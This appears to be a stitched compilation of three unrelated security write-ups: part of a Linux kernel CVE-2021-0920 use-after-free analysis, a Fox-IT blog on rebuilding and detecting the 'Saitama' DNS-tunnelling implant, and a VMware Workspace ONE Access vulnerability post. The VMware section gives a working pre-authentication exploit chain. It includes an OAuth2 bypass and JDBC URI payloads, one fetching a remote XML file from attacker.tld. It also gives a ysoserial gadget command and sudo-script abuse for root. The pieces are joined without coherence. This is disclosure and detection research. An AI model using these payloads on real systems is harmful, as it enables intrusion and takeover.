Stage 2: f00, f01, f10, f31, 𝐼 are garbage.
Stage 2: start purging garbage.
Start calling recvmsg with the MSG_PEEK flag from f10', which would expect to receive f00'
Get skb = skb_peek(&sk->sk_receive_queue); skb is going to be freed by thread 0.
Stage 2: for each skb in the hitlist, call __skb_unlink and kfree_skb later.
state->recv_actor(skb, skip, chunk, state) UAF
GC finished.
Start garbage collection.
Get f10''
Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn't set the MSG_PEEK flag, the UAF can be avoided, because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not running or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and the inflight sockets no longer form an unbreakable cycle.
Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f11 a garbage candidate. For this reason, the next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.
In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.
Patch in 2021
Let's check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it takes the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:
…
+	spin_lock(&unix_gc_lock);
+	spin_unlock(&unix_gc_lock);
…
The patch may look confusing at first: it is rare to see a lock acquired and immediately released with nothing in between. Regardless, the MSG_PEEK path now waits for the completion of the garbage collector, so the UAF issue is resolved.
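The idiom is easier to see in a threaded model. A small sketch (illustrative, not kernel code): acquiring and immediately releasing a lock that the collector holds for its whole run turns the lock into a wait-for-completion barrier.

```python
import threading
import time

unix_gc_lock = threading.Lock()

def unix_gc_model(duration: float) -> None:
    # Stand-in for unix_gc: holds the lock for the whole collection.
    with unix_gc_lock:
        time.sleep(duration)

def peek_fds_model() -> str:
    # The patch's idiom: take the lock and drop it immediately. This
    # blocks until any in-progress collection finishes; the critical
    # section is empty because the lock is used purely as a barrier.
    unix_gc_lock.acquire()
    unix_gc_lock.release()
    return "gc finished; safe to duplicate fds"

t = threading.Thread(target=unix_gc_model, args=(0.1,))
t.start()
time.sleep(0.02)           # let the "collector" take the lock first
result = peek_fds_model()  # returns only after the collector is done
t.join()
```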
BUG_ON Added in 2017
In 2017, Andrey Ulanov from Google found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON on the inflight count.
At first glance, it seems that the BUG_ON could prevent CVE-2021-0920 from being exploitable. However, if the exploit code delays the garbage collection by crafting a large amount of fake garbage, it can get past the BUG_ON check via heap spray.
To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel garbage collector. We have also analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.
The bug was publicly reported in 2016, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actor who saw the public email thread may have had a chance to develop an LPE exploit against the Linux kernel.
In part two, we'll look at how the vulnerability was exploited and at the functionality of the post-compromise modules.
A malware sample dubbed "Saitama" was recently uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordanian government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group's Research and Intelligence Fusion Team (RIFT) to detect DNS-tunnelling implants such as Saitama.
Introduction
For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTPs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary's infrastructure.
In May 2022, security firm Malwarebytes published a two-part blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed "Saitama", sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect, even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.
Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCs) can be useful for retroactive hunting, robust detection in real time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set up in a variety of ways, and how this variety affects the detection engineering process.
To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama. This can be used to control the implant in a lab environment. Moreover, "on the wire" recordings of the implant that were generated using said implementation are shared as PCAP and Zeek logs. This blog also details multiple approaches to detecting the implant's traffic, using a Suricata signature and behavioural detection.
Reconstructing the Saitama trafficΒ
The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere. However, to generate a full recording of the implant's behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available.
If you aim to detect the malware in real time, detection efforts should focus on the way traffic is generated by the implant, rather than on the specific domains that the traffic is sent to. We strongly believe in the "PCAP or it didn't happen" philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP.
The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a proof of concept. We do not intend to fully weaponize the implant "for the greater good", and have thus provided resources up to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.
Letβs do the twist
The usage of DNS as the channel for C2 communication has a few upsides and some major downsides from an attacker's perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee that each query actually reaches the C2 server.
For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to stay perfectly in sync so that both shuffle their character sets in the same way.
On startup, the Saitama implant generates a random number between 0 and 46655 and assigns it to a counter variable. Using a shared secret key ("haruto" for the variant discussed here) and a shared initial character set ("razupgnv2w01eos4t38h7yqidxmkljc6b9f5"), the client encodes this counter and sends it over DNS to the C2 server. The counter is then used as the seed for a pseudo-random number generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every "twist".
Function used by Saitama client to convert an integer into an encoded string
To encode this counter, the implant relies on a function named "_IntToString". This function receives an integer and a "base string", which for the first DNS query is the same initial, shared character set identified in the previous paragraph. Until the input number is zero or lower, the function uses the input number to choose a character from the base string and prepends that to the variable "str", which is returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, bringing its value down.
To determine the initial seed, the server has to "invert" this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion, because the conversion rounds down without any decimals. The server tries to invert the conversion using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client, and thus must verify whether the inversion function calculated the correct seed. If not, the server iteratively tries higher numbers until the correct seed is found.
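Under these assumptions, the encoder and the server-side recovery loop can be sketched as follows (a reconstruction from the description above, not the implant's actual code; the real routine may differ in edge cases, which is why the search loop is kept):

```python
ALPHABET = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared initial charset

def int_to_string(num: int, base_string: str = ALPHABET) -> str:
    # Sketch of the client's "_IntToString": pick a character with the
    # remainder, prepend it, then divide the input down by the base length.
    out = ""
    while num > 0:
        out = base_string[num % len(base_string)] + out
        num //= len(base_string)
    return out or base_string[0]

def recover_counter(encoded: str, base_string: str = ALPHABET) -> int:
    # Server side: estimate the seed by multiplication, then iteratively
    # try higher numbers until re-encoding reproduces the received string.
    guess = 0
    for ch in encoded:
        guess = guess * len(base_string) + base_string.index(ch)
    while int_to_string(guess, base_string) != encoded:
        guess += 1
    return guess
```

With this exact encoder the first guess already round-trips; the search loop only matters when the real encoder loses information, as the blog describes.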
Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG, which in turn shuffles the initial character set into a new one; the new character set is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same "language". The server then simply substitutes the characters of the shuffled alphabet back into the "base" alphabet to recover the data sent by the client.
Server-side implementation to arrive at the same shuffled alphabet as the client
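The synchronization trick can be illustrated with CPython's built-in Mersenne Twister (random.Random). This is a sketch only, since the implant's own Mersenne Twister and shuffle routines differ, but the principle is identical: the same seed yields the same shuffled alphabet on both ends.

```python
import random

BASE = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"

def shuffled_alphabet(counter: int) -> str:
    # Seed a Mersenne Twister with the shared counter and shuffle the
    # shared base alphabet; server and client both derive this per query.
    rng = random.Random(counter)
    chars = list(BASE)
    rng.shuffle(chars)
    return "".join(chars)

def decode(data: str, counter: int) -> str:
    # Substitute characters of the shuffled alphabet back into BASE.
    table = str.maketrans(shuffled_alphabet(counter), BASE)
    return data.translate(table)
```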
Twist, Sleep, Send, Repeat
Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to execute commands and receive output more quickly, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour only triggers an alert when it happens multiple times in a certain period.
The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to βskipβ the sleeping step altogether.Β Β
Sleep configuration of the implant. The integers represent sleep times in milliseconds
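Sketched in Python (domain names are placeholders, not the implant's real C2 domains):

```python
import random

C2_DOMAINS = ["c2-a.example", "c2-b.example", "c2-c.example"]  # placeholders

def next_beacon() -> tuple:
    # Hardcoded scheduling as described: a uniform 40-80 second sleep
    # and one of three domains chosen at random for every query.
    return random.uniform(40.0, 80.0), random.choice(C2_DOMAINS)
```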
These sleep times and the distribution of communication hinder detection efforts, as they allow the implant to further "blend in" with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the "needle" that is this implant's traffic very deep in the haystack of the overall network traffic.
For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy and keeping it usable. Considering Saitama's sleep times, and keeping in mind that every individual DNS query transmits only 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a long time. For example, the standard output of the "whoami /priv" command, which deflates to 663 bytes, takes more than an hour to transmit from victim machine to C2 server.
Transmission between server implementation and the implant
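The back-of-the-envelope arithmetic behind that figure (the payload queries alone account for roughly 45 minutes; command delivery, acknowledgements and retries add the rest):

```python
import math

output_bytes = 663           # zlib-deflated "whoami /priv" output
bytes_per_query = 15         # output bytes carried per DNS query
mean_sleep_s = (40 + 80) / 2 # average of the uniform 40-80 s sleep

data_queries = math.ceil(output_bytes / bytes_per_query)  # 45 queries
payload_minutes = data_queries * mean_sleep_s / 60        # 45.0 minutes
# Control traffic (command delivery, acknowledgements, retries) adds
# further queries, pushing the full exchange past the hour mark.
```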
The implant does contain a set of hardcoded commands that can be triggered using only a command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are actually used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output of these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other command.
Detection
Detecting DNS tunnelling has long been a subject of research, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While "idle" implants can be hard to detect due to the little communication occurring over the wire, any DNS implant has to make more noise once it starts receiving commands and sending command output. These communication "bursts" are where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.
Signature-basedΒ
Where possible, we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant, as outlined previously, makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization follows a specific pattern that we believe can be generalized in the following Suricata rule:
Only trigger if there are more than 50 queries in the last 3600 seconds, and only trigger once per 3600 seconds.
Table one: Content matches for Suricata IDS rule
The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the "send and receive" command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Next, 2 bytes are dedicated to the byte index of the output data, followed by 20 bytes of base-32 encoded output. Lastly, the current value of the "counter" variable is sent. As this number can range between 0 and 46656, it takes between 1 and 5 bytes.
Behaviour-basedΒ
The randomization that makes it difficult to create signatures is also to the defender's advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain with an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, that technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about, is better suited.
Table two: Example DNS queries for various toolings that support DNS tunnelling
Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel, an attacker needs to be able to send multiple commands and receive the corresponding output, resulting in (slow) bursts of multiple queries.
This is where the second step of behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as "randomized". The specifics of these bursts differ slightly between tools, but in general there is little or no idle time between two queries. Saitama is an exception here: it uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive starting point for determining the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value, and in 50% of cases there are fewer than 60 queries in an hour.
To be sure we detect this regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution, we can calculate the number of queries that yields an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to account for possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance false positives and false negatives.
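The threshold can be sanity-checked with the normal approximation described above (a sketch; the exact computation behind the published figure may differ slightly):

```python
import math

MEAN_GAP = 60.0                 # mean of Uniform(40, 80) seconds
VAR_GAP = (80 - 40) ** 2 / 12   # variance of Uniform(40, 80)

def prob_at_least(n: int, window: float = 3600.0) -> float:
    # P(at least n queries in the window) = P(sum of n sleeps <= window),
    # approximating the sum of uniforms by a normal distribution (CLT).
    mu = n * MEAN_GAP
    sigma = math.sqrt(n * VAR_GAP)
    return 0.5 * (1.0 + math.erf((window - mu) / (sigma * math.sqrt(2.0))))
```

prob_at_least(60) is exactly 0.5 (the mean case), while prob_at_least(53) is well above 0.999, which is why 53, rounded down to 50 for slack, makes a safe hourly threshold.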
In summary, combining detection of random-appearing DNS queries with a minimum hourly threshold of such queries can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list of domains that have been verified to be benign.
While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs.Β
Conclusion
When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implantβs behaviour. This can subsequently be used for detection engineering purposes.Β
Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.Β Β
Resources
With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.Β Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub.Β Β
This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.Β
On March 2nd, I reported several security vulnerabilities to VMware impacting their Identity Access Management (IAM) solution. In this blog post I will discuss some of the vulnerabilities I found, the motivation behind finding them, and how companies can protect themselves. The research project concluded with a pre-authenticated remote root exploit chain nicknamed Hekate. The advisories and patches for these vulnerabilities can be found in the references section.
Introduction
Single Sign On (SSO) has become the dominant authentication scheme for logging in to several related, yet independent, software systems. At the core of this are the identity providers (IdP). Their role is to perform credential verification and to supply a signed token containing assertions that a service provider (SP) can consume for access control. This is implemented using a protocol called Security Assertion Markup Language (SAML).
On the other hand, when an application requests resources on behalf of a user and they're granted, an authorization request is made to an authorization server (AS). The AS exchanges a code for a token, which is presented to a resource server (RS), and the requested resources are consumed by the requesting application. This is known as Open Authorization (OAuth); the "auth" here stands for authorization, not authentication.
Whilst OAuth2 handles authorization (access) and SAML handles authentication (identity), a solution is needed to manage both, since an organization's network perimeter can get very wide and complex. Therefore, Identity and Access Management (IAM) solutions have become very popular in the enterprise environment for handling both use cases at scale.
Motivation
This project was motivated by high-impact vulnerabilities affecting similar software products. Let's take a look, in no particular order:
Cisco Identity Services Engine
This product was pwned by Pedro Ribeiro and Dominik Czarnota using a pre-authenticated stored XSS vulnerability leading to full remote root access by chaining two additional vulnerabilities.
ForgeRock OpenAM
This product was pwned by Michael Stepankin using a pre-authenticated deserialization of untrusted data vulnerability in a 3rd party library called jato. Michael had to get creative here by using a custom Java gadget chain to exploit the vulnerability.
Oracle Access Manager (OAM)
Peter Json and Jang blogged about a pre-authenticated deserialization of untrusted data vulnerability impacting older versions of OAM.
VMWare Workspace ONE Access
Two high-impact vulnerabilities were discovered here. The first was CVE-2020-4006, which was exploited in the wild (ITW) by state-sponsored attackers and initially sparked my interest. The details of this bug were first revealed by William Vu, and it essentially boiled down to a post-authenticated command injection vulnerability. The fact that this bug was post-authenticated and yet was still exploited in the wild likely means that this software product is of high interest to attackers.
With most of this knowledge before I even started, I knew that vulnerabilities discovered in a system like this would have a high impact. So, at the time I asked myself: does a pre-authenticated remote code execution vulnerability/chain exist in this code base?
Version
The vulnerable version at the time of testing was 21.08.0.1, the latest at the time, deployed using the identity-manager-21.08.0.1-19010796_OVF10.ova (SHA1: 69e9fb988522c92e98d2910cc106ba4348d61851) file. It was released on the 9th of December 2021 according to the release notes. This was a Photon OS Linux deployment designed for the cloud.
Challenges
I faced several challenges, and I think it's important to document them so that others are not discouraged when performing similar audits.
Heavy use of Spring libraries
This software product heavily relies on several Spring components, and as such it didn't leave room for many errors in relation to authentication. Interceptors play a huge role in the authentication process and were found not to contain any logic vulnerabilities in this case.
Additionally, with Spring's StrictHttpFirewall enabled, several attempts to bypass the authentication using well-known filter bypass attacks failed.
Minimal attack surface
There was very little pre-authenticated attack surface exposing application functionality outside of authentication protocols like SAML and OAuth 2.0 (including OpenID Connect), which minimized the chance of discovering a pre-authenticated remote code execution vulnerability.
Code quality
The code quality of this product was very good. Having audited many Java applications in the past, I noticed that this product was written with security in mind; the overall layout of libraries, the syntax used and even the spelling throughout the code reflected that. In the end, I found only two remote code execution vulnerabilities, and both were in a very similar component.
Letβs move on to discussing the vulnerabilities in depth.
OAuth2TokenResourceController Access Control Service (ACS) Authentication Bypass Vulnerability
The com.vmware.horizon.rest.controller.oauth2.OAuth2TokenResourceController class has two exposed endpoints. The first will generate an activation code for an existing oauth2 client:
@RequestMapping(value = {"/generateActivationToken/{id}"}, method = {RequestMethod.POST})
@ResponseBody
@ApiOperation(value = "Generate and update activation token for an existing oauth2 client", response = OAuth2ActivationTokenMedia.class)
@ApiResponses({@ApiResponse(code = 500, message = "Generation failed, unknown error."), @ApiResponse(code = 400, message = "Generation failed, client is invalid or not specified.")})
public OAuth2ActivationTokenMedia generateActivationToken(@ApiParam(value = "OAuth 2.0 Client identifier", example = "\"my-auth-grant-client1\"", required = true) @PathVariable("id") String clientId, HttpServletRequest request) throws MyOneLoginException {
    OrganizationRuntime orgRuntime = getOrgRuntime(request);
    OAuth2Client client = this.oAuth2ClientService.getOAuth2Client(orgRuntime.getOrganizationId().intValue(), clientId);
    if (client == null || client.getIdUser() == null) {
        throw new BadRequestException("invalid.client", new Object[0]);
    }
The second will activate the device OAuth2 client by exchanging the activation code for a client ID and client secret:
@RequestMapping(value = {"/activate"}, method = {RequestMethod.POST})
@ResponseBody
@AllowExecutionWhenReadOnly
@ApiOperation(value = "Activate the device client by exchanging an activation code for a client ID and client secret.", notes = "This endpoint is used in the dynamic mobile registration flow. The activation code is obtained by calling the /SAAS/auth/device/register endpoint. The client_secret and client_id returned in this call will be used in the call to the /SAAS/auth/oauthtoken endpoint.", response = OAuth2ClientActivationDetails.class)
@ApiResponses({@ApiResponse(code = 500, message = "Activation failed, unknown error."), @ApiResponse(code = 404, message = "Activation failed, organization not found."), @ApiResponse(code = 400, message = "Activation failed, activation code is invalid or not specified.")})
public OAuth2ClientActivationDetails activateOauth2Client(@ApiParam(value = "the activation code", required = true) @RequestBody String activationCode, HttpServletRequest request) throws MyOneLoginException {
    OrganizationRuntime organizationRuntime = getOrgRuntime(request);
    try {
        return this.activationTokenService.activateAndGetOAuth2Client(organizationRuntime.getOrganization(), activationCode);
    } catch (EncryptionException e) {
        throw new BadRequestException("invalid.activation.code", e, new Object[0]);
    } catch (MyOneLoginException e) {
        if (e.getCode() == 80480 || e.getCode() == 80476 || e.getCode() == 80440 || e.getCode() == 80558) {
            throw new BadRequestException("invalid.activation.code", e, new Object[0]);
        }
        throw e;
    }
}
This is enough for an attacker to then exchange the client_id and client_secret for an OAuth2 token, achieving a complete authentication bypass. Now, this wouldn't have been so easily exploitable if no default OAuth2 clients were present, but as it turns out, there are two internal clients installed by default:
We can verify this when we check the database on the system:
These clients are created in several locations; one of them is the com.vmware.horizon.rest.controller.system.BootstrapController class. I won't bore you with the full stack trace, but it essentially leads to a call to createTenant in the com.vmware.horizon.components.authentication.OAuth2RemoteAccessServiceImpl class:
public boolean createTenant(int orgId, String tenantId) {
    try {
        createDefaultServiceOAuth2Client(orgId); // 1
    } catch (Exception e) {
        log.warn("Failed to create the default service oauth2 client for org " + tenantId, e);
        return false;
    }
    return true;
}
At [1] the code calls createDefaultServiceOAuth2Client:
The code at [2] calls createSystemScopedServiceOAuth2Client which, as the name suggests, creates a system-scoped OAuth2 client using the clientId "Service__OAuth2Client". I actually found another authentication bypass, documented as SRC-2022-0007, using variant analysis; however, it impacts only the cloud environment because the on-premise version does not load the authz Spring profile by default.
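Putting the endpoints and the default client together, the bypass chain can be summarized as three unauthenticated requests. The sketch below is hypothetical: the target host and the REST path prefix are assumptions, while the endpoint names and the final /SAAS/auth/oauthtoken exchange come from the controller annotations shown earlier.

```python
# Hypothetical sketch of the bypass chain. The host and the
# /SAAS/API/1.0/REST/oauth2 prefix are assumptions; the endpoint names and
# the token-exchange endpoint are taken from the controller annotations.
BASE = "https://target.example/SAAS/API/1.0/REST/oauth2"
CLIENT_ID = "Service__OAuth2Client"  # default system-scoped client

# 1. Mint an activation token for the default client.
step1 = f"POST {BASE}/generateActivationToken/{CLIENT_ID}"

# 2. Exchange the activation token for a client_id and client_secret.
step2 = f"POST {BASE}/activate"

# 3. Exchange the client credentials for an OAuth2 token at the endpoint
#    named in the @ApiOperation notes (the grant type shown is an assumption).
step3 = "POST https://target.example/SAAS/auth/oauthtoken?grant_type=client_credentials"

for step in (step1, step2, step3):
    print(step)
```

From there, the resulting OAuth2 token can be used as a bearer credential against authenticated APIs.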
At [1] the code checks whether there are any existing organizations (there will be if the appliance is set up correctly), and at [2] the code validates that an admin is requesting the endpoint. At [3] the code calls DbConnectionCheckServiceImpl.checkConnection using the attacker-controlled jdbcUrl.
The code calls FactoryHelper.getConnection at [5].
public Connection getConnection(String jdbcUrl, String username, String password) throws SQLException {
    try {
        return DriverManager.getConnection(jdbcUrl, username, password); // 6
    } catch (Exception ex) {
        if (ex.getCause() != null && ex.getCause().toString().contains("javax.net.ssl.SSLHandshakeException")) {
            log.info(String.format("ssl handshake failed for the user:%s ", new Object[]{username}));
            throw new SQLException("database.connection.ssl.notSuccess");
        }
        log.info(String.format("Connection failed for the user:%s ", new Object[]{username}));
        throw new SQLException("database.connection.notSuccess");
    }
}
Finally, at [6] the attacker can reach a DriverManager.getConnection sink which will lead to an arbitrary JDBC URI connection. Given the flexibility of JDBC, the attacker can use any of the deployed drivers within the application. This vulnerability can lead to remote code execution as the horizon user which will be discussed in the exploitation section.
publishCaCert and gatherConfig Privilege Escalation
After gaining remote code execution as the horizon user, we can exploit the following vulnerability to gain root access. This section contains two bugs, but I decided to report it as a single vulnerability due to the way I (ab)used them in the final exploit chain.
The publishCaCert.hzn script allows attackers to disclose sensitive files.
The gatherConfig.hzn script allows attackers to take ownership of sensitive files.
These scripts can be executed by the horizon user with root privileges without a password using sudo. They were not writable by the horizon user so I audited the scripts for logical issues to escalate cleanly.
publishCaCert.hzn:
For this bug, we can see that the script takes a file on the command line, copies it to /etc/ssl/certs/ at [1], and then makes it readable by all users at [2]!
#!/bin/sh
# Script to isolate sudo access to just publishing a single file to the trusted certs directory
CERTFILE=$1
DESTFILE=$(basename $2)

cp -f $CERTFILE /etc/ssl/certs/$DESTFILE # 1
chmod 644 /etc/ssl/certs/$DESTFILE       # 2
c_rehash > /dev/null
gatherConfig.hzn:
For taking ownership, we can use a symlink called debugConfig.txt pointing at a root-owned file, which the chown at [1] will then hand over to the tomcat user.
#!/bin/bash
#
# Minor: Copyright 2019 VMware, Inc. All rights reserved.
. /usr/local/horizon/scripts/hzn-bin.inc
. /usr/local/horizon/scripts/manageTcCfg.inc

DEBUG_FILE=$1
#...
function gatherConfig() {
    printLines
    echo "1) cat /usr/local/horizon/conf/flags/sysconfig.hostname" > ${DEBUG_FILE}
    #...
    chown $TOMCAT_USER:$TOMCAT_GROUP $DEBUG_FILE # 1
}

if [ -z "$DEBUG_FILE" ]
then
    usage
else
    DEBUG_FILE=${DEBUG_FILE}/"debugConfig.txt"
    gatherConfig
fi
Technique 1 - Remote code execution via the MySQL JDBC Driver autoDeserialize
It was also possible to achieve remote code execution via the MySQL JDBC driver by using the autoDeserialize property. The server would connect back to the attacker's malicious MySQL server, which could deliver an arbitrary serialized Java object to be deserialized on the server. As it turns out, the off-the-shelf ysoserial CommonsBeanutils1 gadget worked a treat: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 <cmd>.
This technique was first presented by Yang Zhang, Keyi Li, Yongtao Wang and Kunzhe Chai at Blackhat Europe 2019. This was the technique I used in the exploit I sent to VMware because I wanted to hint at their usage of unsafe libraries that contain off-the-shelf gadget chains!
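For reference, the attacker-supplied JDBC URI for this technique typically looks like the sketch below. The autoDeserialize property is named above; the ServerStatusDiffInterceptor property (queryInterceptors in Connector/J 8.x, statementInterceptors in older 5.x drivers) is an assumption drawn from the public research, and attacker.tld is a placeholder.

```python
from urllib.parse import parse_qs, urlsplit

# Sketch of an attacker-supplied MySQL JDBC URI (attacker.tld is a
# placeholder). With autoDeserialize enabled and a ServerStatusDiffInterceptor
# configured, the driver deserializes attacker-controlled bytes returned by
# the rogue MySQL server.
jdbc_uri = (
    "jdbc:mysql://attacker.tld:3306/saas"
    "?autoDeserialize=true"
    "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"
)

# Java's DriverManager receives the full string; here we just show the
# properties the driver would parse out of it.
props = parse_qs(urlsplit(jdbc_uri[len("jdbc:"):]).query)
print(props["autoDeserialize"])
```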
Technique 2 - Remote code execution via the PostgreSQL JDBC Driver socketFactory
It was possible to perform remote code execution via the socketFactory property of the PostgreSQL JDBC driver. By setting the socketFactory and socketFactoryArg properties, an attacker can trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Since the application was using Spring with a Postgres database, it was the perfect candidate to (ab)use FileSystemXmlApplicationContext!
Proof of Concept: jdbc:postgresql://si/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.tld:9090/bean.xml.
But of course, we can improve on this. Inspired by RicterZ, suppose you want to exploit the bug without internet access. You can re-use the com.vmware.licensecheck.LicenseChecker class VMware provides and mix deserialization with the PostgreSQL JDBC driver attack.
Letβs walk from one of the LicenseChecker constructors, right to the vulnerable sink.
At [1] the code calls another constructor in the same class with the passed-in string. At [2] the code calls setState on the LicenseHandle class:
public void setState(String var1) {
    if (var1 != null && var1.length() >= 1) {
        try {
            byte[] var2 = MyBase64.decode(var1); // 3
            if (var2 != null && this.deserialize(var2)) { // 4
                this._state = var1;
                this._isDirty = false;
            }
        } catch (Exception var3) {
            log.debug(new Object[]{"failed to decode state: " + var3.getMessage()});
        }
    }
}
At [3] the code base64 decodes the string and at [4] the code then calls deserialize:
private boolean deserialize(byte[] var1) {
    if (var1 == null) {
        return true;
    } else {
        try {
            ByteArrayInputStream var2 = new ByteArrayInputStream(var1);
            DataInputStream var3 = new DataInputStream(var2);
            int var4 = var3.readInt();
            switch (var4) {
                case -889267490:
                    return this.deserialize_v2(var3); // 5
                default:
                    log.debug(new Object[]{"bad magic: " + var4});
            }
        } catch (Exception var5) {
            log.debug(new Object[]{"failed to de-serialize handle: " + var5.getMessage()});
        }
        return false;
    }
}
You can probably see where this is going already. At [5] the code calls deserialize_v2 if a supplied int is -889267490:
private boolean deserialize_v2(DataInputStream var1) throws IOException {
    byte[] var2 = Encrypt.readByteArray(var1);
    if (var2 == null) {
        log.debug(new Object[]{"failed to read cipherText"});
        return false;
    } else {
        try {
            byte[] var3 = Encrypt.decrypt(var2, new String(keyBytes_v2)); // 6
            if (var3 == null) {
                log.debug(new Object[]{"failed to decrypt state data"});
                return false;
            } else {
                ByteArrayInputStream var4 = new ByteArrayInputStream(var3);
                ObjectInputStream var5 = new ObjectInputStream(var4);
                this._htEvalStart = (Hashtable)var5.readObject(); // 7
